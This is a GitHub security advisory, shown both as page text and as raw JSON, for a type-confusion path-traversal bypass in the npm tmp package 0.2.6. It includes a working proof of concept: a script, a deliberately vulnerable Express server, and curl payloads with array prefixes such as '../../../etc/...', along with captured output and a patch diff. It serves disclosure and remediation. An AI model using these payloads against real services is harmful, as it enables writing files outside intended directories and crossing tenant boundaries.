GHSA-7C78-JF6Q-G5CM
Vulnerability from github – Published: 2026-06-15 16:36 – Updated: 2026-06-15 16:36
VLAI
Summary
tmp: Type-confusion bypass of _assertPath allows path traversal via non-string prefix/postfix/template
Details
Summary
The _assertPath guard added to tmp@0.2.6 rejects only string values that contain the substring ... It is bypassed when prefix, postfix, or template is supplied as a non-string value (Array, Buffer, or any object) whose includes('..') returns falsy but whose stringification still contains ../. The value flows through Array.prototype.join/String coercion inside _generateTmpName and path.join(tmpDir, opts.dir, name), producing a final path that escapes tmpdir and creates a file or directory at an attacker-controlled location with the host process's privileges.
This affects any application that forwards untrusted request data (a common pattern is JSON body fields or qs-parsed bracket-array query strings such as ?prefix[]=...) into tmp.file, tmp.fileSync, tmp.dir, tmp.dirSync, tmp.tmpName, or tmp.tmpNameSync without explicit type coercion.
Impact
- Arbitrary file creation outside the intended temporary directory, with the running process's filesystem permissions.
- Directory creation outside the intended tree (via
tmp.dir{,Sync}), which can then host a subsequent symlink swap. - File content that the application writes to the returned descriptor lands at the attacker's chosen path. In multi-tenant services this crosses tenant boundaries; in CI/build systems it can write into source trees, build outputs, or web roots.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L - score 8.1 (High). Network-reachable when the consumer passes request data unchanged.
Affected versions
tmp >= 0.2.6 (the _assertPath guard introduced by commit 7ef2728 / merged in efa4a06f). Earlier releases are vulnerable to the plain string form (already published as a separate advisory) plus this bypass.
Vulnerable code
lib/tmp.js at tag v0.2.6, commit 41f7159:
// lib/tmp.js:533-539
function _assertPath(path) {
if (path.includes("..")) {
throw new Error("Relative value not allowed");
}
return path;
}
// lib/tmp.js:577-580
options.prefix = _isUndefined(options.prefix) ? '' : _assertPath(options.prefix);
options.postfix = _isUndefined(options.postfix) ? '' : _assertPath(options.postfix);
options.template = _isUndefined(options.template) ? undefined : _assertPath(options.template);
// lib/tmp.js:515-525 - opts.prefix and opts.postfix are stringified by Array.prototype.join
const name = [
opts.prefix ? opts.prefix : 'tmp',
'-',
process.pid,
'-',
_randomChars(12),
opts.postfix ? '-' + opts.postfix : ''
].join('');
return path.join(tmpDir, opts.dir, name);
Root cause: _assertPath assumes its argument is a string. For an Array argument, Array.prototype.includes('..') checks element equality (so ['../escape'].includes('..') is false); for an arbitrary object, Object.prototype.includes does not exist and a duck-typed includes: () => false defeats the check entirely. In both shapes, the subsequent [...].join('') and path.join(...) coerce the value to its underlying string, which still contains ../.
How untrusted data reaches _assertPath
Two production-realistic shapes that yield a non-string prefix/postfix/template:
- JSON request bodies.
express.json()(and any other JSON body parser) preserves the parsed value's type. A body of{"prefix":["../escape"]}reaches the handler as an Array. qs-style bracket-array query strings. Express 4's defaultqsparser turns?prefix[]=../escapeinto['../escape']. The same applies to any framework usingqs(Fastify, Koa with bodyparser, Hapi via configured parsers, etc.).
The consumer pattern is the natural one - forward req.body.prefix directly into tmp.file({ prefix, tmpdir }) with no developer-side coercion. The 0.2.6 release notes describe the guard as preventing prefix/postfix traversal, so consumers reasonably believe the guard covers the typical input flow.
Proof of concept (string vs array)
poc.js (run after npm install tmp@0.2.6):
const tmp = require('tmp');
const path = require('path');
const fs = require('fs');
const baseDir = fs.mkdtempSync('/tmp/safe-base-');
console.log('[negative control] string "../escape" - must be blocked');
try {
const r = tmp.fileSync({ tmpdir: baseDir, prefix: '../escape' });
console.log(' UNEXPECTED, file at:', r.name);
r.removeCallback();
} catch (e) {
console.log(' BLOCKED as expected:', e.message);
}
console.log('\n[bypass] array ["../escape"] - same effective value, not blocked');
try {
const r = tmp.fileSync({ tmpdir: baseDir, prefix: ['../escape'] });
console.log(' CREATED at:', r.name);
console.log(' ESCAPED:', !path.resolve(r.name).startsWith(path.resolve(baseDir)));
r.removeCallback();
} catch (e) {
console.log(' BLOCKED:', e.message);
}
console.log('\n[bypass] duck-typed object {toString, includes} - also not blocked');
try {
const r = tmp.fileSync({
tmpdir: baseDir,
prefix: { toString: () => '../escape', includes: () => false }
});
console.log(' CREATED at:', r.name);
console.log(' ESCAPED:', !path.resolve(r.name).startsWith(path.resolve(baseDir)));
r.removeCallback();
} catch (e) {
console.log(' BLOCKED:', e.message);
}
Observed output on tmp@0.2.6:
[negative control] string "../escape" - must be blocked
BLOCKED as expected: Relative value not allowed
[bypass] array ["../escape"] - same effective value, not blocked
CREATED at: /private/tmp/escape-78856-D3p4mEWyapSn
ESCAPED: true
[bypass] duck-typed object {toString, includes} - also not blocked
CREATED at: /private/tmp/escape-78856-zP4qXkRm12Lf
ESCAPED: true
End-to-end reproduction (against the deployed npm package)
Install:
mkdir tmp-bypass-poc && cd tmp-bypass-poc
npm init -y
npm install tmp@0.2.6 express@5
victim-server.js - realistic Express app that forwards a JSON body field into tmp.file:
const express = require('express');
const tmp = require('tmp');
const fs = require('fs');
const path = require('path');
const app = express();
app.use(express.json());
const TENANT_BASE = fs.mkdtempSync('/tmp/tenant-base-');
console.log('[victim] Tenant base dir:', TENANT_BASE);
app.post('/upload', (req, res) => {
const userPrefix = req.body.prefix; // attacker-controlled
console.log('[victim] received prefix:', JSON.stringify(userPrefix),
'(type:', Array.isArray(userPrefix) ? 'array' : typeof userPrefix, ')');
tmp.file({ tmpdir: TENANT_BASE, prefix: userPrefix }, (err, filepath, fd, cleanup) => {
if (err) {
console.log('[victim] tmp error:', err.message);
return res.status(400).json({ error: err.message });
}
fs.writeSync(fd, 'attacker-controlled-content');
fs.closeSync(fd);
const escaped = !path.resolve(filepath).startsWith(path.resolve(TENANT_BASE));
console.log('[victim] file created at:', filepath, 'ESCAPED:', escaped);
res.json({ filepath, escaped, tenantBase: TENANT_BASE });
});
});
app.listen(3000, () => console.log('[victim] http://127.0.0.1:3000'));
Run:
node victim-server.js &
Drive three requests from another shell:
echo '=== ATTACK 1: string prefix - caught by 0.2.6 ==='
curl -s -X POST -H 'Content-Type: application/json' \
-d '{"prefix":"../escape-string"}' http://127.0.0.1:3000/upload
echo
echo '=== ATTACK 2: array prefix - bypasses 0.2.6 ==='
curl -s -X POST -H 'Content-Type: application/json' \
-d '{"prefix":["../escape-array"]}' http://127.0.0.1:3000/upload
echo
echo '=== ATTACK 3: multi-level traversal toward /etc ==='
curl -s -X POST -H 'Content-Type: application/json' \
-d '{"prefix":["../../../etc/poc-tmp-bypass"]}' http://127.0.0.1:3000/upload
Captured transcript (verbatim from the test rig):
=== ATTACK 1: string prefix - caught by 0.2.6 ===
{"error":"Relative value not allowed"}
=== ATTACK 2: array prefix - bypasses 0.2.6 ===
{"filepath":"/private/tmp/escape-array-79635-gEFyGCBNFSTh","escaped":true,"tenantBase":"/tmp/tenant-base-3XHwPZ"}
=== ATTACK 3: multi-level traversal toward /etc ===
{"error":"EACCES: permission denied, open '/etc/poc-tmp-bypass-79635-PEIABptX8JGH'"}
Server log:
[victim] Tenant base dir: /tmp/tenant-base-3XHwPZ
[victim] received prefix: "../escape-string" (type: string )
[victim] tmp error: Relative value not allowed
[victim] received prefix: ["../escape-array"] (type: array )
[victim] file created at: /private/tmp/escape-array-79635-gEFyGCBNFSTh ESCAPED: true
[victim] received prefix: ["../../../etc/poc-tmp-bypass"] (type: array )
[victim] tmp error: EACCES: permission denied, open '/etc/poc-tmp-bypass-79635-PEIABptX8JGH'
Observations:
- ATTACK 1 (string
../escape-string) is rejected at_assertPath. The 0.2.6 guard works for plain strings. - ATTACK 2 (array
["../escape-array"]) passes the guard and creates a file at/private/tmp/escape-array-..., outside the tenant base/tmp/tenant-base-3XHwPZ. The file content isattacker-controlled-content. Confirmed withls:
$ ls -la /tmp/escape-array-*
-rw-------@ 1 rick wheel 27 May 27 20:25 /tmp/escape-array-79635-gEFyGCBNFSTh
$ cat /tmp/escape-array-*
attacker-controlled-content
$ ls -la /tmp/tenant-base-3XHwPZ/
total 0
drwx------ 2 rick wheel 64 May 27 20:25 .
Tenant base is empty. The escape is complete.
- ATTACK 3 (array
["../../../etc/poc-tmp-bypass"]) reachesfs.openfor/etc/poc-tmp-bypass-.... The open fails only because of POSIX permissions, not because tmp blocked the path. On a process running as root, or against any world-writable target directory, this would succeed.
Negative control with patched build
Applying the suggested fix below and re-running ATTACK 2:
=== ATTACK 2: array prefix - after fix ===
{"error":"prefix option must be a string, got \"object\"."}
The patched build rejects non-string prefix/postfix/template with a clear type error before the path is constructed.
Suggested fix
Patch _assertPath to require a string argument. The check value.includes('..') is sound only over strings; any non-string with a custom or array-element includes semantics bypasses it.
--- a/lib/tmp.js
+++ b/lib/tmp.js
@@ -528,11 +528,14 @@ function _generateTmpName(opts) {
/**
- * Check the prefix and postfix options
+ * Check the prefix, postfix, and template options
*
* @private
*/
-function _assertPath(path) {
- if (path.includes("..")) {
+function _assertPath(option, value) {
+ if (typeof value !== 'string') {
+ throw new Error(`${option} option must be a string, got "${typeof value}".`);
+ }
+ if (value.includes("..")) {
throw new Error("Relative value not allowed");
}
- return path;
+ return value;
}
@@ -575,9 +578,9 @@ function _assertOptionsBase(options) {
options.unsafeCleanup = !!options.unsafeCleanup;
// for completeness' sake only, also keep (multiple) blanks if the user, purportedly sane, requests us to
- options.prefix = _isUndefined(options.prefix) ? '' : _assertPath(options.prefix);
- options.postfix = _isUndefined(options.postfix) ? '' : _assertPath(options.postfix);
- options.template = _isUndefined(options.template) ? undefined : _assertPath(options.template);
+ options.prefix = _isUndefined(options.prefix) ? '' : _assertPath('prefix', options.prefix);
+ options.postfix = _isUndefined(options.postfix) ? '' : _assertPath('postfix', options.postfix);
+ options.template = _isUndefined(options.template) ? undefined : _assertPath('template', options.template);
}
Defence-in-depth, recommended in addition to the type check: validate the final resolved path against tmpdir after _generateTmpName, similar to what _getRelativePath already does for dir and template. That way any future bypass through a different vector (e.g., a future Node path change, or a different option) does not exit tmpdir.
Fix PR
https://github.com/raszi/node-tmp-ghsa-7c78-jf6q-g5cm/pull/1
Credit
Reported by tonghuaroot.
Severity
8.2 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "tmp"
},
"ranges": [
{
"events": [
{
"introduced": "0.2.6"
},
{
"fixed": "0.2.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-49982"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T16:36:46Z",
"nvd_published_at": "2026-06-11T17:16:35Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe `_assertPath` guard added to `tmp@0.2.6` rejects only string values that contain the substring `..`. It is bypassed when `prefix`, `postfix`, or `template` is supplied as a non-string value (Array, Buffer, or any object) whose `includes(\u0027..\u0027)` returns falsy but whose stringification still contains `../`. The value flows through `Array.prototype.join`/`String` coercion inside `_generateTmpName` and `path.join(tmpDir, opts.dir, name)`, producing a final path that escapes `tmpdir` and creates a file or directory at an attacker-controlled location with the host process\u0027s privileges.\n\nThis affects any application that forwards untrusted request data (a common pattern is JSON body fields or `qs`-parsed bracket-array query strings such as `?prefix[]=...`) into `tmp.file`, `tmp.fileSync`, `tmp.dir`, `tmp.dirSync`, `tmp.tmpName`, or `tmp.tmpNameSync` without explicit type coercion.\n\n### Impact\n\n- Arbitrary file creation outside the intended temporary directory, with the running process\u0027s filesystem permissions.\n- Directory creation outside the intended tree (via `tmp.dir{,Sync}`), which can then host a subsequent symlink swap.\n- File content that the application writes to the returned descriptor lands at the attacker\u0027s chosen path. In multi-tenant services this crosses tenant boundaries; in CI/build systems it can write into source trees, build outputs, or web roots.\n\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L - score 8.1 (High). Network-reachable when the consumer passes request data unchanged.\n\n### Affected versions\n\n`tmp` \u003e= 0.2.6 (the `_assertPath` guard introduced by commit 7ef2728 / merged in efa4a06f). Earlier releases are vulnerable to the plain string form (already published as a separate advisory) plus this bypass.\n\n### Vulnerable code\n\n`lib/tmp.js` at tag `v0.2.6`, commit 41f7159:\n\n```javascript\n// lib/tmp.js:533-539\nfunction _assertPath(path) {\n if (path.includes(\"..\")) {\n throw new Error(\"Relative value not allowed\");\n }\n\n return path;\n}\n```\n\n```javascript\n// lib/tmp.js:577-580\noptions.prefix = _isUndefined(options.prefix) ? \u0027\u0027 : _assertPath(options.prefix);\noptions.postfix = _isUndefined(options.postfix) ? \u0027\u0027 : _assertPath(options.postfix);\noptions.template = _isUndefined(options.template) ? undefined : _assertPath(options.template);\n```\n\n```javascript\n// lib/tmp.js:515-525 - opts.prefix and opts.postfix are stringified by Array.prototype.join\nconst name = [\n opts.prefix ? opts.prefix : \u0027tmp\u0027,\n \u0027-\u0027,\n process.pid,\n \u0027-\u0027,\n _randomChars(12),\n opts.postfix ? \u0027-\u0027 + opts.postfix : \u0027\u0027\n].join(\u0027\u0027);\n\nreturn path.join(tmpDir, opts.dir, name);\n```\n\nRoot cause: `_assertPath` assumes its argument is a string. For an `Array` argument, `Array.prototype.includes(\u0027..\u0027)` checks element equality (so `[\u0027../escape\u0027].includes(\u0027..\u0027)` is `false`); for an arbitrary object, `Object.prototype.includes` does not exist and a duck-typed `includes: () =\u003e false` defeats the check entirely. In both shapes, the subsequent `[...].join(\u0027\u0027)` and `path.join(...)` coerce the value to its underlying string, which still contains `../`.\n\n### How untrusted data reaches `_assertPath`\n\nTwo production-realistic shapes that yield a non-string `prefix`/`postfix`/`template`:\n\n1. JSON request bodies. `express.json()` (and any other JSON body parser) preserves the parsed value\u0027s type. A body of `{\"prefix\":[\"../escape\"]}` reaches the handler as an Array.\n2. `qs`-style bracket-array query strings. Express 4\u0027s default `qs` parser turns `?prefix[]=../escape` into `[\u0027../escape\u0027]`. The same applies to any framework using `qs` (Fastify, Koa with bodyparser, Hapi via configured parsers, etc.).\n\nThe consumer pattern is the natural one - forward `req.body.prefix` directly into `tmp.file({ prefix, tmpdir })` with no developer-side coercion. The 0.2.6 release notes describe the guard as preventing prefix/postfix traversal, so consumers reasonably believe the guard covers the typical input flow.\n\n### Proof of concept (string vs array)\n\n`poc.js` (run after `npm install tmp@0.2.6`):\n\n```javascript\nconst tmp = require(\u0027tmp\u0027);\nconst path = require(\u0027path\u0027);\nconst fs = require(\u0027fs\u0027);\n\nconst baseDir = fs.mkdtempSync(\u0027/tmp/safe-base-\u0027);\n\nconsole.log(\u0027[negative control] string \"../escape\" - must be blocked\u0027);\ntry {\n const r = tmp.fileSync({ tmpdir: baseDir, prefix: \u0027../escape\u0027 });\n console.log(\u0027 UNEXPECTED, file at:\u0027, r.name);\n r.removeCallback();\n} catch (e) {\n console.log(\u0027 BLOCKED as expected:\u0027, e.message);\n}\n\nconsole.log(\u0027\\n[bypass] array [\"../escape\"] - same effective value, not blocked\u0027);\ntry {\n const r = tmp.fileSync({ tmpdir: baseDir, prefix: [\u0027../escape\u0027] });\n console.log(\u0027 CREATED at:\u0027, r.name);\n console.log(\u0027 ESCAPED:\u0027, !path.resolve(r.name).startsWith(path.resolve(baseDir)));\n r.removeCallback();\n} catch (e) {\n console.log(\u0027 BLOCKED:\u0027, e.message);\n}\n\nconsole.log(\u0027\\n[bypass] duck-typed object {toString, includes} - also not blocked\u0027);\ntry {\n const r = tmp.fileSync({\n tmpdir: baseDir,\n prefix: { toString: () =\u003e \u0027../escape\u0027, includes: () =\u003e false }\n });\n console.log(\u0027 CREATED at:\u0027, r.name);\n console.log(\u0027 ESCAPED:\u0027, !path.resolve(r.name).startsWith(path.resolve(baseDir)));\n r.removeCallback();\n} catch (e) {\n console.log(\u0027 BLOCKED:\u0027, e.message);\n}\n```\n\nObserved output on `tmp@0.2.6`:\n\n```text\n[negative control] string \"../escape\" - must be blocked\n BLOCKED as expected: Relative value not allowed\n\n[bypass] array [\"../escape\"] - same effective value, not blocked\n CREATED at: /private/tmp/escape-78856-D3p4mEWyapSn\n ESCAPED: true\n\n[bypass] duck-typed object {toString, includes} - also not blocked\n CREATED at: /private/tmp/escape-78856-zP4qXkRm12Lf\n ESCAPED: true\n```\n\n### End-to-end reproduction (against the deployed npm package)\n\nInstall:\n\n```bash\nmkdir tmp-bypass-poc \u0026\u0026 cd tmp-bypass-poc\nnpm init -y\nnpm install tmp@0.2.6 express@5\n```\n\n`victim-server.js` - realistic Express app that forwards a JSON body field into `tmp.file`:\n\n```javascript\nconst express = require(\u0027express\u0027);\nconst tmp = require(\u0027tmp\u0027);\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\n\nconst app = express();\napp.use(express.json());\n\nconst TENANT_BASE = fs.mkdtempSync(\u0027/tmp/tenant-base-\u0027);\nconsole.log(\u0027[victim] Tenant base dir:\u0027, TENANT_BASE);\n\napp.post(\u0027/upload\u0027, (req, res) =\u003e {\n const userPrefix = req.body.prefix; // attacker-controlled\n console.log(\u0027[victim] received prefix:\u0027, JSON.stringify(userPrefix),\n \u0027(type:\u0027, Array.isArray(userPrefix) ? \u0027array\u0027 : typeof userPrefix, \u0027)\u0027);\n\n tmp.file({ tmpdir: TENANT_BASE, prefix: userPrefix }, (err, filepath, fd, cleanup) =\u003e {\n if (err) {\n console.log(\u0027[victim] tmp error:\u0027, err.message);\n return res.status(400).json({ error: err.message });\n }\n fs.writeSync(fd, \u0027attacker-controlled-content\u0027);\n fs.closeSync(fd);\n const escaped = !path.resolve(filepath).startsWith(path.resolve(TENANT_BASE));\n console.log(\u0027[victim] file created at:\u0027, filepath, \u0027ESCAPED:\u0027, escaped);\n res.json({ filepath, escaped, tenantBase: TENANT_BASE });\n });\n});\n\napp.listen(3000, () =\u003e console.log(\u0027[victim] http://127.0.0.1:3000\u0027));\n```\n\nRun:\n\n```bash\nnode victim-server.js \u0026\n```\n\nDrive three requests from another shell:\n\n```bash\necho \u0027=== ATTACK 1: string prefix - caught by 0.2.6 ===\u0027\ncurl -s -X POST -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"prefix\":\"../escape-string\"}\u0027 http://127.0.0.1:3000/upload\n\necho\necho \u0027=== ATTACK 2: array prefix - bypasses 0.2.6 ===\u0027\ncurl -s -X POST -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"prefix\":[\"../escape-array\"]}\u0027 http://127.0.0.1:3000/upload\n\necho\necho \u0027=== ATTACK 3: multi-level traversal toward /etc ===\u0027\ncurl -s -X POST -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"prefix\":[\"../../../etc/poc-tmp-bypass\"]}\u0027 http://127.0.0.1:3000/upload\n```\n\nCaptured transcript (verbatim from the test rig):\n\n```text\n=== ATTACK 1: string prefix - caught by 0.2.6 ===\n{\"error\":\"Relative value not allowed\"}\n\n=== ATTACK 2: array prefix - bypasses 0.2.6 ===\n{\"filepath\":\"/private/tmp/escape-array-79635-gEFyGCBNFSTh\",\"escaped\":true,\"tenantBase\":\"/tmp/tenant-base-3XHwPZ\"}\n\n=== ATTACK 3: multi-level traversal toward /etc ===\n{\"error\":\"EACCES: permission denied, open \u0027/etc/poc-tmp-bypass-79635-PEIABptX8JGH\u0027\"}\n```\n\nServer log:\n\n```text\n[victim] Tenant base dir: /tmp/tenant-base-3XHwPZ\n[victim] received prefix: \"../escape-string\" (type: string )\n[victim] tmp error: Relative value not allowed\n[victim] received prefix: [\"../escape-array\"] (type: array )\n[victim] file created at: /private/tmp/escape-array-79635-gEFyGCBNFSTh ESCAPED: true\n[victim] received prefix: [\"../../../etc/poc-tmp-bypass\"] (type: array )\n[victim] tmp error: EACCES: permission denied, open \u0027/etc/poc-tmp-bypass-79635-PEIABptX8JGH\u0027\n```\n\nObservations:\n\n- ATTACK 1 (string `../escape-string`) is rejected at `_assertPath`. The 0.2.6 guard works for plain strings.\n- ATTACK 2 (array `[\"../escape-array\"]`) passes the guard and creates a file at `/private/tmp/escape-array-...`, outside the tenant base `/tmp/tenant-base-3XHwPZ`. The file content is `attacker-controlled-content`. Confirmed with `ls`:\n\n```bash\n$ ls -la /tmp/escape-array-*\n-rw-------@ 1 rick wheel 27 May 27 20:25 /tmp/escape-array-79635-gEFyGCBNFSTh\n$ cat /tmp/escape-array-*\nattacker-controlled-content\n$ ls -la /tmp/tenant-base-3XHwPZ/\ntotal 0\ndrwx------ 2 rick wheel 64 May 27 20:25 .\n```\n\n Tenant base is empty. The escape is complete.\n\n- ATTACK 3 (array `[\"../../../etc/poc-tmp-bypass\"]`) reaches `fs.open` for `/etc/poc-tmp-bypass-...`. The open fails only because of POSIX permissions, not because tmp blocked the path. On a process running as root, or against any world-writable target directory, this would succeed.\n\n### Negative control with patched build\n\nApplying the suggested fix below and re-running ATTACK 2:\n\n```text\n=== ATTACK 2: array prefix - after fix ===\n{\"error\":\"prefix option must be a string, got \\\"object\\\".\"}\n```\n\nThe patched build rejects non-string `prefix`/`postfix`/`template` with a clear type error before the path is constructed.\n\n### Suggested fix\n\nPatch `_assertPath` to require a string argument. The check `value.includes(\u0027..\u0027)` is sound only over strings; any non-string with a custom or array-element `includes` semantics bypasses it.\n\n```diff\n--- a/lib/tmp.js\n+++ b/lib/tmp.js\n@@ -528,11 +528,14 @@ function _generateTmpName(opts) {\n /**\n- * Check the prefix and postfix options\n+ * Check the prefix, postfix, and template options\n *\n * @private\n */\n-function _assertPath(path) {\n- if (path.includes(\"..\")) {\n+function _assertPath(option, value) {\n+ if (typeof value !== \u0027string\u0027) {\n+ throw new Error(`${option} option must be a string, got \"${typeof value}\".`);\n+ }\n+ if (value.includes(\"..\")) {\n throw new Error(\"Relative value not allowed\");\n }\n\n- return path;\n+ return value;\n }\n@@ -575,9 +578,9 @@ function _assertOptionsBase(options) {\n options.unsafeCleanup = !!options.unsafeCleanup;\n\n // for completeness\u0027 sake only, also keep (multiple) blanks if the user, purportedly sane, requests us to\n- options.prefix = _isUndefined(options.prefix) ? \u0027\u0027 : _assertPath(options.prefix);\n- options.postfix = _isUndefined(options.postfix) ? \u0027\u0027 : _assertPath(options.postfix);\n- options.template = _isUndefined(options.template) ? undefined : _assertPath(options.template);\n+ options.prefix = _isUndefined(options.prefix) ? \u0027\u0027 : _assertPath(\u0027prefix\u0027, options.prefix);\n+ options.postfix = _isUndefined(options.postfix) ? \u0027\u0027 : _assertPath(\u0027postfix\u0027, options.postfix);\n+ options.template = _isUndefined(options.template) ? undefined : _assertPath(\u0027template\u0027, options.template);\n }\n```\n\nDefence-in-depth, recommended in addition to the type check: validate the final resolved path against `tmpdir` after `_generateTmpName`, similar to what `_getRelativePath` already does for `dir` and `template`. That way any future bypass through a different vector (e.g., a future Node `path` change, or a different option) does not exit `tmpdir`.\n\n### Fix PR\n\nhttps://github.com/raszi/node-tmp-ghsa-7c78-jf6q-g5cm/pull/1\n\n### Credit\n\nReported by tonghuaroot.",
"id": "GHSA-7c78-jf6q-g5cm",
"modified": "2026-06-15T16:36:46Z",
"published": "2026-06-15T16:36:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-7c78-jf6q-g5cm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49982"
},
{
"type": "PACKAGE",
"url": "https://github.com/raszi/node-tmp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "tmp: Type-confusion bypass of _assertPath allows path traversal via non-string prefix/postfix/template"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…